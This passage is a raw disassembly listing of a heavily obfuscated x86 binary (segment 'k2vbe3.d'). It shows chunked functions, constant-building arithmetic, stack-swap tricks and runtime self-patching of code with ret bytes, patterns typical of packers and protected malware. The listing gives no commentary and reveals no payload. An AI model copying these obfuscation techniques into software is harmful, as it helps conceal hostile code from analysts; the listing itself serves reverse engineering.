		add	ecx, 115087ABh
		and	ecx, 23188787h
		add	ecx, 2E4C645h
		add	ecx, ebp
		jmp	loc_43E799
; END OF FUNCTION CHUNK	FOR sub_445F6E

; =============== S U B	R O U T	I N E =======================================



sub_43E2FC	proc near		; DATA XREF: k2vbe3.d:00448492o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E9B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443C61 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044C960 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D1D8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004573AF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00457981 SIZE 0000000C BYTES

		push	33675D4h
		pop	eax
		xor	eax, 24EAF455h
		and	eax, 18BB795Ch
		add	eax, 1937C52Bh
		call	sub_4553CC
		jmp	loc_44D1D8
sub_43E2FC	endp

; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 11h
		mov	ds:dword_43FA70, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EBB

loc_43E329:				; CODE XREF: sub_454EBB-C125j
		jmp	nullsub_485
; END OF FUNCTION CHUNK	FOR sub_454EBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_43E32E:				; CODE XREF: sub_44B94B-C89Fj
		jmp	loc_457CA4
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_43E333:				; CODE XREF: k2vbe3.d:00454B6Fj
		rol	eax, 11h
		jmp	loc_441997
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E9D

loc_43E33B:				; CODE XREF: sub_443E9D+14B36j
		push	817E088Eh
		pop	ecx
		sub	ecx, 471B24D0h
		and	ecx, ds:4000F3h
		sub	ecx, 22AF15E3h
		add	ecx, 1AB07391h
		mov	[ecx], eax
		jmp	loc_456456
; END OF FUNCTION CHUNK	FOR sub_443E9D

; =============== S U B	R O U T	I N E =======================================



sub_43E360	proc near		; CODE XREF: k2vbe3.d:004493C2j
					; sub_451C29+7p

; FUNCTION CHUNK AT 00441D39 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443A90 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449162 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045BDF2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045C1B5 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_459DA3
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+0]
		call	sub_4570C0
		xchg	ebp, [esp+0]
		jmp	loc_443A90
sub_43E360	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_43E37C:				; CODE XREF: sub_457D4B:loc_44D10Cj
					; sub_457D4B-AC28j
		sub	eax, 12BF9A5Bh
		and	eax, 3B939D5h
		add	eax, 0FF13285Ch
		mov	eax, [eax]
		jmp	loc_4460BD
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_43E395:				; CODE XREF: sub_4440E5-25Dj
		popf

loc_43E396:				; CODE XREF: sub_4440E5:loc_4440EAj
		push	0CC34385h
		pop	eax
		or	eax, 7BF8CF7Ah
		and	eax, 7086FF57h
		rol	eax, 0Fh
		and	eax, 46EDE247h
		jmp	loc_456B81
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------

loc_43E3B6:				; CODE XREF: k2vbe3.d:0044969Dj
		xor	eax, 0AC2379E3h
		add	eax, ebp
		add	eax, 0EF76D78Ch
		mov	eax, [eax]
		mov	dx, [eax+2]
		push	offset sub_457D11
		jmp	loc_43E7FB
; ---------------------------------------------------------------------------

locret_43E3D4:				; CODE XREF: k2vbe3.d:loc_44DCE6j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_43E3D5:				; CODE XREF: sub_443FC1+15C5Cj
		jmp	loc_45A817
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
		call	sub_444C8D
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43E3DF:				; CODE XREF: sub_45A323-5964j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_43E3E4:				; CODE XREF: k2vbe3.d:0044A91Fj
		jmp	loc_457370
; ---------------------------------------------------------------------------
		mov	ds:off_41E084, eax
		lea	eax, sub_45AB7E
		mov	byte ptr [eax],	0C3h
		jmp	loc_43CA7A

; =============== S U B	R O U T	I N E =======================================



sub_43E3FD	proc near		; CODE XREF: sub_40A074+194p
					; sub_40D41A+212p ...

; FUNCTION CHUNK AT 0043C802 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00449AB6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004595ED SIZE 00000005 BYTES

		push	edi
		push	4B301EC8h
		pop	edi
		jmp	loc_43C802
sub_43E3FD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sbb	eax, 8A5BB92Dh
		jmp	sub_4475D5
; ---------------------------------------------------------------------------

locret_43E414:				; CODE XREF: k2vbe3.d:00446EB4j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44081A

loc_43E415:				; CODE XREF: sub_44081A+16C12j
		jmp	loc_443450
; END OF FUNCTION CHUNK	FOR sub_44081A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44067C

loc_43E41A:				; CODE XREF: sub_44067C+8676j
		jmp	loc_45B922
; END OF FUNCTION CHUNK	FOR sub_44067C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_43E41F:				; CODE XREF: sub_44E0F6:loc_44BC41j
		and	edx, 5A6E2CD4h
		sub	edi, 67C29F75h
		jl	loc_442390

loc_43E431:				; CODE XREF: sub_44E0F6:loc_44BC39j
		rol	esi, 0Eh
		add	esi, 0B8212F36h
		jmp	loc_441115
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_43E43F:				; CODE XREF: sub_44DAF6-5B7Bj
		and	ecx, 4BF975CAh
		xor	ecx, 4A7921C8h
		xchg	ecx, [esp+0]
		push	edi
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_43E44F:				; CODE XREF: sub_43DA1E:loc_4499F8j
		pushf
		push	72C87817h
		ror	edi, 16h
		jmp	loc_440AE6
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
		shr	edx, 17h
		jmp	sub_456706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_43E465:				; CODE XREF: sub_44128B+10BF8j
		jz	loc_45612E
		jmp	loc_4443BA
; END OF FUNCTION CHUNK	FOR sub_44128B

; =============== S U B	R O U T	I N E =======================================



sub_43E470	proc near		; DATA XREF: sub_44E481:loc_450225o

; FUNCTION CHUNK AT 0043CE43 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004442D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004473EB SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00447AAE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004494F6 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00454AA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455573 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455CC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457823 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00459A91 SIZE 0000000D BYTES

		sub	al, 99h
		mov	edx, [ebp-4]
		call	sub_45101A

loc_43E47A:				; CODE XREF: sub_446E24+12D13j
		jmp	loc_455573
sub_43E470	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_43E47F:				; CODE XREF: sub_44BB73-875Ej
		jmp	loc_4597C7
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_43E484:				; CODE XREF: sub_4580DF-BD2j
		sbb	ebp, 4C282A4Fh

loc_43E48A:				; CODE XREF: sub_4580DF:loc_457505j
		sub	edi, 6BA1CBBAh
		test	edi, 400h
		jmp	loc_44DAB4
; END OF FUNCTION CHUNK	FOR sub_4580DF

; =============== S U B	R O U T	I N E =======================================



sub_43E49B	proc near		; DATA XREF: k2vbe3.d:00444AC1o
		call	nullsub_494
		jmp	ds:dword_41E148
sub_43E49B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_43E4A6:				; CODE XREF: sub_45512F-714Fj
		jmp	nullsub_191
; END OF FUNCTION CHUNK	FOR sub_45512F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_494. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jz	loc_450C34
		mov	eax, [esp]
		push	eax
		mov	eax, edx
		jmp	loc_44DA4D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_43E4BD:				; CODE XREF: sub_43F7AC:loc_452AD4j
		jnz	loc_43D9A0
		jmp	loc_453C0A
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------

loc_43E4C8:				; CODE XREF: k2vbe3.d:00448F58j
		jle	loc_43DA51

; =============== S U B	R O U T	I N E =======================================



sub_43E4CE	proc near		; CODE XREF: k2vbe3.d:00456D8Bp

; FUNCTION CHUNK AT 0044D83A SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00459E05 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	20A6AE28h
		pop	edx
		or	edx, 76CC32A8h
		and	edx, 89B26B0Bh
		add	edx, 564E59F2h
		jmp	loc_459E05
sub_43E4CE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	ecx, edx
		jmp	sub_44F174
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_43E4F6:				; CODE XREF: sub_44B94B:loc_451658j
		mov	eax, [ebp-4]
		inc	eax
		jmp	loc_43D113
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_43E4FF:				; CODE XREF: sub_44F20A:loc_4585D4j
		mov	eax, [ebp-4]
		call	sub_44D345
		test	al, al
		jnz	loc_45686D
		call	sub_4541C2

loc_43E514:				; CODE XREF: k2vbe3.d:00454173j
		jmp	loc_44FE9D
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43E519:				; CODE XREF: sub_45A323-17462j
		jmp	loc_440CF7
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_43E51E:				; CODE XREF: sub_44469A:loc_449149j
		jnz	loc_456639
		jmp	loc_4402FF
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------

loc_43E529:				; DATA XREF: sub_4443DD+BD42o
		lea	eax, sub_451CCE
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_43E52F:				; CODE XREF: sub_4481FA+9C1Ej
		mov	byte ptr [eax],	0C3h
		jmp	loc_43F1A6
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CCE

loc_43E537:				; CODE XREF: sub_451CCEj
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		jmp	sub_43D786
; END OF FUNCTION CHUNK	FOR sub_451CCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_43E546:				; CODE XREF: sub_456C15-833Aj
		jnp	loc_458962

loc_43E54C:				; CODE XREF: sub_456C15:loc_43DD49j
		call	sub_4436CE
		mov	edx, 20413B0Fh
		push	ebx
		jmp	loc_44BCD1
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_43E55C:				; CODE XREF: sub_44DF16-11521j
		ror	ebx, 10h
		sub	ebp, 0B71FF297h

loc_43E565:				; CODE XREF: sub_44DF16:loc_44E321j
		push	0F9092FFh
		pop	eax
		and	eax, 0E2D9FBE4h
		or	eax, 7A315088h
		xor	eax, 9EFE60F3h
		test	eax, 4000h
		jmp	loc_452954
; END OF FUNCTION CHUNK	FOR sub_44DF16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452693

loc_43E588:				; CODE XREF: sub_452693:loc_4581A5j
		xor	edx, 9AECA7D2h
		add	edx, 0B6B18978h
		call	sub_44B7E2

loc_43E599:				; CODE XREF: k2vbe3.d:0044688Cj
		push	offset loc_4435F4
		jmp	loc_440815
; END OF FUNCTION CHUNK	FOR sub_452693
; ---------------------------------------------------------------------------
		test	edx, 7C3E2808h
		jmp	loc_44E63B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45530F

loc_43E5AE:				; CODE XREF: sub_45530F:loc_458E18j
		jbe	loc_43C4E5
		add	edx, 0B5C95094h
		popf
		jmp	loc_4504FF
; END OF FUNCTION CHUNK	FOR sub_45530F
; ---------------------------------------------------------------------------
		cmp	ecx, 0B49BE8A1h
		jmp	loc_4489D7
; ---------------------------------------------------------------------------
		test	eax, eax
		jz	loc_440F45
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43E5D3:				; CODE XREF: sub_45A323:loc_43DC0Dj
		jmp	loc_44AF66
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43E5D8:				; CODE XREF: sub_44C90E+67EDj
		sub	ebx, ebp
		popf
		test	edi, ebp
		jmp	loc_44A4BF
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		push	80451B6Ah
		jmp	loc_44AD63
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_43E5EC:				; CODE XREF: sub_4423D2+18AEDj
		jnz	loc_443F2C
		or	ebx, edx
		jmp	loc_443F29
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------

loc_43E5F9:				; CODE XREF: k2vbe3.d:00444CE6j
		or	eax, 6C29D805h
		cmp	eax, 0F5F945C4h
		jmp	loc_44756D
; ---------------------------------------------------------------------------

loc_43E60A:				; DATA XREF: sub_44AE1C+14o
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		mov	eax, [ebp-4]
		push	eax
		call	sub_44FA5A

loc_43E619:				; DATA XREF: k2vbe3.d:0045046Fo
		push	ecx
		push	592DC450h
		pop	ecx
		rol	ecx, 1Ah
		jmp	loc_45053A
; ---------------------------------------------------------------------------

loc_43E628:				; CODE XREF: k2vbe3.d:00446760j
		jz	loc_444465
		jmp	loc_44FCED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_43E633:				; CODE XREF: sub_44B979:loc_44C935j
		xor	eax, esi
		jmp	loc_44DD5E
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------

loc_43E63A:				; CODE XREF: k2vbe3.d:loc_4569E3j
		lea	eax, [ebp-24h]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		push	edx
		call	sub_445FB0
		test	esi, 0DB1E7552h
		jmp	loc_4455D2
; ---------------------------------------------------------------------------
		adc	ebp, 0F49A764Dh
		jle	loc_44C8E6
		jmp	sub_448218
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_43E665:				; CODE XREF: sub_4424CF:loc_44FC74j
		add	edx, 16E22C30h
		rol	edx, 1
		add	edx, 0D054F0AAh
		add	edx, ebp
		jmp	loc_4586E8
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CE6C

loc_43E67A:				; CODE XREF: sub_44CE6C-83EDj
		pushf
; END OF FUNCTION CHUNK	FOR sub_44CE6C

; =============== S U B	R O U T	I N E =======================================



sub_43E67B	proc near		; CODE XREF: k2vbe3.d:004591ADp
		xchg	edx, [esp+0]
		pop	edx
		push	ecx
		mov	ecx, edx

loc_43E682:				; CODE XREF: k2vbe3.d:00454CFDj
		xchg	ecx, [esp+0]
		push	offset sub_457FB0
		jmp	nullsub_501
sub_43E67B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43E68F:				; CODE XREF: sub_45A323-1B7E2j
					; sub_44A20D+14j
		jnz	loc_459698
		jmp	loc_44AE86
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_43E69A	proc near		; DATA XREF: k2vbe3.d:00450C95o
		mov	eax, [eax+24h]
		call	sub_456D32
sub_43E69A	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43C04E

loc_43E6A2:				; CODE XREF: sub_43C04E+F4F9j
		jmp	nullsub_77
; END OF FUNCTION CHUNK	FOR sub_43C04E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_43E6A7:				; CODE XREF: sub_44E0F6+438Cj
		xor	ecx, edi
		shl	ebx, 14h
		jmp	loc_43FC2B
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------

loc_43E6B1:				; CODE XREF: k2vbe3.d:loc_45297Dj
					; k2vbe3.d:00459250j
		push	0
		push	0
		push	edi
		push	97180645h
		jmp	loc_440068
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D594

loc_43E6C0:				; CODE XREF: sub_44CF60+14j
		mov	ds:dword_41E138, eax
		lea	eax, nullsub_7
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_7
; END OF FUNCTION CHUNK	FOR sub_44D594

; =============== S U B	R O U T	I N E =======================================



sub_43E6D4	proc near		; CODE XREF: sub_40B4CD:loc_40B5ABp
					; k2vbe3.d:0044C495j
					; DATA XREF: ...

; FUNCTION CHUNK AT 0043C829 SIZE 00000005 BYTES

		push	offset loc_44C490
		jmp	loc_43C829
sub_43E6D4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_43E6DE:				; CODE XREF: sub_4460FD+18j
		jz	loc_4591D7
		jmp	loc_454713
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_43E6E9:				; CODE XREF: sub_443FC1:loc_44FBADj
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_43E6EB:				; CODE XREF: sub_443FC1:loc_443261j
		push	0DF42D10Bh
		pop	eax
		or	eax, 0A8A5305Fh
		add	eax, 5C091Dh
		mov	eax, [eax]
		mov	edx, [ebp-4]
		jmp	loc_442C5B
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------

loc_43E707:				; CODE XREF: k2vbe3.d:0043C3D0j
		and	ebp, 0AAC9B032h
		shr	esi, 1Ah
		jmp	loc_45AC55
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_43E715:				; CODE XREF: sub_452CF7:loc_44190Cj
		add	eax, ebp
		add	eax, 5D5BEA05h
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		push	40h
		push	6CD04966h
		pop	eax
		jmp	loc_449E90
; END OF FUNCTION CHUNK	FOR sub_452CF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_43E730:				; CODE XREF: sub_449372-8FD1j
		jnp	loc_456089
		test	ebx, esi
		jmp	loc_43F21A
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_43E73D:				; CODE XREF: sub_450F71-D7B9j
		jo	loc_450FE2
		sub	ecx, eax

loc_43E745:				; CODE XREF: sub_450F71:loc_44CC08j
		movzx	eax, word ptr [ebp-6]
		push	offset sub_44DCF5
		jmp	loc_4492C6
; END OF FUNCTION CHUNK	FOR sub_450F71

; =============== S U B	R O U T	I N E =======================================



sub_43E753	proc near		; DATA XREF: k2vbe3.d:004551E6o

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043EEC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004422D0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00442A92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045144D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455FF5 SIZE 0000001E BYTES

		push	edx
		call	sub_44367E
		push	92C4BB83h
		pop	eax
		and	eax, 6675C2B4h
		rol	eax, 2
		jmp	loc_442A92
sub_43E753	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_43E76D:				; CODE XREF: sub_444EFA:loc_44BB68j
					; sub_444EFA+11EB4j
		push	81634CD0h
		pop	eax
		xor	eax, 7B8308D0h
		cmp	eax, 27C487E4h
		jmp	loc_43EEF9
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------

loc_43E784:				; CODE XREF: k2vbe3.d:loc_44689Bj
		xchg	edi, [esp]
		push	ebx
		push	36740878h
		pop	ebx
		or	ebx, 2C8767C4h
		jmp	loc_45BE17
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F6E

loc_43E799:				; CODE XREF: sub_445F6E-7C77j
		add	ecx, 0FB0B38A6h
		call	sub_454EDD

loc_43E7A4:				; CODE XREF: k2vbe3.d:0045683Ej
		jmp	loc_446FC2
; END OF FUNCTION CHUNK	FOR sub_445F6E

; =============== S U B	R O U T	I N E =======================================



sub_43E7A9	proc near		; DATA XREF: sub_43D244+1DC21o
		add	edx, 945D8BADh
		mov	[edx], eax
		push	offset sub_43F20A
		jmp	nullsub_438
sub_43E7A9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_43E7BB:				; CODE XREF: sub_45AD42-8CBCj
		add	ecx, 2D43E649h
; END OF FUNCTION CHUNK	FOR sub_45AD42
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_43E7C1:				; CODE XREF: sub_446E24:loc_45B003j
		mov	ecx, [ecx]
		push	edx
		pushf
		jmp	loc_44980F
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
		push	edx
		push	offset loc_44C54D
		jmp	loc_44EA5B
; ---------------------------------------------------------------------------

loc_43E7D5:				; CODE XREF: k2vbe3.d:loc_44F3E9j
		jz	loc_43E0C8
		jnz	loc_43FBFE
		jmp	loc_4526A3
; ---------------------------------------------------------------------------
		push	esi
		mov	esi, eax
		xchg	esi, [esp]
		ror	eax, 1Ch
		mov	ds:dword_442860, eax
		retn
; ---------------------------------------------------------------------------

loc_43E7F6:				; CODE XREF: k2vbe3.d:004526D5j
		jmp	sub_456767
; ---------------------------------------------------------------------------

loc_43E7FB:				; CODE XREF: k2vbe3.d:0043E3CFj
		jmp	locret_45AAB1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445EB0

loc_43E800:				; CODE XREF: sub_445EB0-8393j
		jmp	nullsub_38
; END OF FUNCTION CHUNK	FOR sub_445EB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BD5

loc_43E805:				; CODE XREF: sub_444BD5:loc_45C32Cj
		call	sub_45687E
; END OF FUNCTION CHUNK	FOR sub_444BD5
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_43E80A:				; CODE XREF: sub_4440E5+12AB8j
		jmp	loc_45AC30
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------

loc_43E80F:				; CODE XREF: k2vbe3.d:0045083Fj
		jmp	locret_449C69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_43E814:				; CODE XREF: sub_440C94+BCE6j
		pop	eax
		push	edi
		push	0BD2579E5h
		pop	edi
		xor	edi, 389CF692h
		jmp	loc_44D24B
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB7E

loc_43E827:				; CODE XREF: sub_45AB7E-C3C7j
		pop	eax
		sub	eax, 2425EC43h

loc_43E82E:				; CODE XREF: k2vbe3.d:loc_440A79j
		cmp	eax, 0F973CD27h
		jmp	loc_453E8A
; END OF FUNCTION CHUNK	FOR sub_45AB7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454639

loc_43E839:				; CODE XREF: sub_454639:loc_4520C3j
		push	esi
		push	43A873DDh
		pop	esi
		or	esi, 16F27D5Dh
		sub	esi, 0D51895D2h
		jmp	loc_458517
; END OF FUNCTION CHUNK	FOR sub_454639
; ---------------------------------------------------------------------------

loc_43E851:				; CODE XREF: k2vbe3.d:0043D149j
		cmp	ebp, 61154E36h
		jmp	loc_4551F6
; ---------------------------------------------------------------------------

loc_43E85C:				; CODE XREF: k2vbe3.d:0043DA7Ej
		jnz	loc_4483D5
; START	OF FUNCTION CHUNK FOR sub_459EE5

loc_43E862:				; CODE XREF: sub_459EE5+8j
		jmp	loc_45A303
; END OF FUNCTION CHUNK	FOR sub_459EE5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456471

loc_43E867:				; CODE XREF: sub_456471-4B65j
		jmp	loc_44C153
; END OF FUNCTION CHUNK	FOR sub_456471
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_43E86C:				; CODE XREF: sub_45762D-13B7Aj
		jmp	loc_44C9B8
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4530B2

loc_43E871:				; CODE XREF: sub_4530B2-11FD3j
		jmp	loc_441F3C
; END OF FUNCTION CHUNK	FOR sub_4530B2
; ---------------------------------------------------------------------------
		adc	ecx, ebx
		adc	edi, 576C09C6h
		jmp	loc_4483D5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_162. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_43E884:				; CODE XREF: sub_44D298+9j
		jmp	loc_440B24
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_43E889:				; CODE XREF: sub_44128B-51E0j
		jmp	loc_44DBE2
; END OF FUNCTION CHUNK	FOR sub_44128B

; =============== S U B	R O U T	I N E =======================================



sub_43E88E	proc near		; DATA XREF: k2vbe3.d:004554E3o

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00449FE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E0B4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044F5E4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00452E2E SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00456C96 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A111 SIZE 00000005 BYTES

		jz	loc_456C96
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	esi
		mov	esi, edx
		xchg	esi, [esp+0]
		call	sub_444615
		jmp	loc_449FE4
sub_43E88E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jz	loc_43E9C0
		jmp	loc_45936F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_43E8B3:				; CODE XREF: sub_443FAC-49F2j
					; sub_43C3A9:loc_457BA4j
		push	0F28627F1h
		pop	ecx
		rol	ecx, 0Ah
		add	ecx, 0E451A149h
		jmp	loc_44D89A
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453FF1

loc_43E8C7:				; CODE XREF: sub_453FF1:loc_45089Ej
		push	60D0255Eh
		mov	ebp, [edx]
		jmp	loc_444AD6
; END OF FUNCTION CHUNK	FOR sub_453FF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_43E8D3:				; CODE XREF: sub_451EEA-718Cj
		pop	edi
; END OF FUNCTION CHUNK	FOR sub_451EEA

; =============== S U B	R O U T	I N E =======================================



sub_43E8D4	proc near		; CODE XREF: k2vbe3.d:0044D824p

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [esp-4+arg_0]
		push	ecx
		jmp	loc_4449A2
sub_43E8D4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_43E8E1:				; CODE XREF: sub_44DB59-6448j
		jz	loc_453FA9
		jmp	loc_45AFE9
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------

loc_43E8EC:				; CODE XREF: k2vbe3.d:0043D6F8j
		and	ecx, 0CC01C498h
		add	ecx, 85319CF7h
